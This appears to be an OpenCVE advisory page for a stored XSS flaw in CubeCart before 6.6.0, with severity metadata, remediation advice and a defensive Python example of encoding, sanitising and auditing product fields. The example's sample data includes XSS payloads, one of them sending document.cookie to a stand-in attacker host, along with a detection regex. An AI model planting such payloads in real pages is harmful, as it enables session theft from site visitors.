Description
CubeCart is an ecommerce software solution. Prior to 6.6.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in CubeCart v6.x. An attacker with administrative privileges can inject malicious JavaScript payloads into multiple fields during the creation or modification of a product. These payloads are stored in the database and executed whenever a user (customer or another administrator) views the affected product pages, which could lead to session hijacking or unauthorized actions. This vulnerability is fixed in 6.6.0.
Published: 2026-05-13
Score: 4.8 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

CubeCart versions prior to 6.6.0 contain a stored XSS flaw that allows an attacker with administrative privileges to embed malicious JavaScript into product fields during creation or editing. The payload is persisted in the database and executed whenever anyone—customers or other administrators—views the affected product page, potentially enabling session hijacking or the execution of unauthorized actions.

Affected Systems

The vulnerability affects the CubeCart ecommerce platform, all 6.x releases before 6.6.0. Every installation still running one of those releases is affected regardless of configuration, since the injection point is the standard product create/edit form.

Risk and Exploitability

The CVSS 3.1 base score of 4.8 (AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N) indicates moderate severity; the EPSS score is below 1% (very low) and the vulnerability is not listed in CISA's KEV catalog, although the SSVC assessment records that a proof of concept exists. Only users with administrative rights can inject the payload, so an external attacker must first compromise an administrator account or otherwise obtain privileged access. Once privileged, injection is straightforward, but the payload only executes when a victim (a customer or another administrator) views the affected product page (UI:R). The scope change reflects that script stored through the admin panel runs in other users' browsers, where the realistic impact is theft of session material and actions performed in the victim's session (C:L/I:L).

Generated by OpenCVE AI on May 13, 2026 at 22:27 UTC.

Remediation

The advisory states that the vulnerability is fixed in CubeCart 6.6.0. No separate workaround is listed on this page.

OpenCVE Recommended Actions

  • Upgrade CubeCart to version 6.6.0 or a later release, which fixes the stored XSS vulnerability.
  • Apply context-aware output encoding at render time to every product field shown in storefront and admin templates (HTML body, attribute and JavaScript contexts each need their own encoding); for rich-text fields such as descriptions, run an allowlist HTML sanitizer rather than trusting stored markup. Storing a payload is not the problem; rendering it unencoded is.
  • Limit the number of administrator accounts, protect them with strong authentication, and monitor the admin audit trail for unexpected product edits so an injected payload is noticed quickly.
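The two code-level actions above, output encoding for plain-text fields plus allowlist sanitisation for rich-text fields, and auditing stored product rows for active content, are shown together below as an added example. This is not CubeCart's code and is written in Python rather than CubeCart's PHP; the product rows, field names (`name`, `description`) and templates are constructed for illustration, and the sanitiser's tag allowlist is an assumption for the demonstration. The payload shapes mirror what the advisory describes: admin-supplied product fields carrying JavaScript.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample product rows (hypothetical schema, not CubeCart's).
# Row 1 is benign; row 2 carries the kind of payload the advisory describes,
# one attribute-breakout in the plain-text name and one event handler in the
# rich-text description.
PRODUCTS = [
    {"product_id": 1, "name": "Plain Widget",
     "description": "A <b>bold</b> widget."},
    {"product_id": 2, "name": 'Widget" onmouseover="alert(1)',
     "description": '<img src=x onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">'},
]

# Tags a product description is allowed to keep. Attributes are never kept,
# which is what removes onerror/onclick style handlers.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "ul", "li"}


class AllowlistSanitizer(HTMLParser):
    """Re-serialise markup keeping only allowlisted tags with no attributes.
    Text is HTML-escaped on the way out, so nothing can become active content."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")   # attributes are deliberately dropped

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))


def sanitize_rich_text(markup):
    """Return markup reduced to the allowlist; disallowed tags vanish, their
    text content stays as inert escaped text."""
    parser = AllowlistSanitizer()
    parser.feed(markup)
    parser.close()
    return "".join(parser.out)


def render_product_unsafe(p):
    """Vulnerable pattern: admin-supplied fields concatenated straight into HTML."""
    return f'<h1 title="{p["name"]}">{p["name"]}</h1><div>{p["description"]}</div>'


def render_product_safe(p):
    """Hardened pattern: escape the plain-text field for both attribute and body
    context, sanitise the rich-text field, and only then build the HTML."""
    name = html.escape(p["name"], quote=True)
    desc = sanitize_rich_text(p["description"])
    return f'<h1 title="{name}">{name}</h1><div>{desc}</div>'


# Heuristic for auditing what is already stored: script tags, on* handlers,
# javascript: URLs and embedding tags. Expect some false positives on legitimate
# rich text; the point is to surface rows for a human to look at.
SUSPICIOUS = re.compile(
    r"<\s*script\b|\bon[a-z]+\s*=|javascript\s*:|<\s*(iframe|object|embed)\b", re.I)


def audit_products(products):
    """Return (product_id, field) pairs whose stored content looks like active content."""
    findings = []
    for p in products:
        for field in ("name", "description"):
            if SUSPICIOUS.search(p[field]):
                findings.append((p["product_id"], field))
    return findings


if __name__ == "__main__":
    for p in PRODUCTS:
        print("unsafe:", render_product_unsafe(p))
        print("safe:  ", render_product_safe(p))
    print("audit findings:", audit_products(PRODUCTS))
```

Running the block shows the second product's `onmouseover` landing inside a live `title` attribute in the unsafe render, while the safe render keeps it as inert text and drops the `<img>` entirely. In a PHP code base the equivalent of `html.escape(..., quote=True)` is `htmlspecialchars($s, ENT_QUOTES, 'UTF-8')`, and a maintained sanitiser such as HTML Purifier should replace the toy allowlist parser for real rich-text fields.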


Advisories

No advisories yet.

History

Thu, 14 May 2026 15:00:00 +0000

Type                 Values Removed   Values Added
First Time appeared                   Cubecart
                                      Cubecart cubecart
Vendors & Products                    Cubecart
                                      Cubecart cubecart

Thu, 14 May 2026 13:15:00 +0000

Type                 Values Removed   Values Added
Metrics                               ssvc
                                      {'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Wed, 13 May 2026 21:15:00 +0000

Type                 Values Removed   Values Added
Description                           CubeCart is an ecommerce software solution. Prior to 6.6.0, a Stored Cross-Site Scripting (XSS) vulnerability exists in CubeCart v6.x. An attacker with administrative privileges can inject malicious JavaScript payloads into multiple fields during the creation or modification of a product. These payloads are stored in the database and executed whenever a user (customer or another administrator) views the affected product pages, which could lead to session hijacking or unauthorized actions. This vulnerability is fixed in 6.6.0.
Title                                 CubeCart: Stored Cross-Site Scripting (XSS)
Weaknesses                            CWE-79
References
Metrics                               cvssV3_1
                                      {'score': 4.8, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}


Subscriptions

Cubecart Cubecart
MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-05-14T12:52:08.863Z

Reserved: 2026-04-07T00:23:30.596Z

Link: CVE-2026-39428

Vulnrichment

Updated: 2026-05-14T12:51:56.187Z

NVD

Status : Deferred

Published: 2026-05-13T21:16:46.800

Modified: 2026-05-14T16:49:18.583

Link: CVE-2026-39428

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-14T14:33:24Z

Weaknesses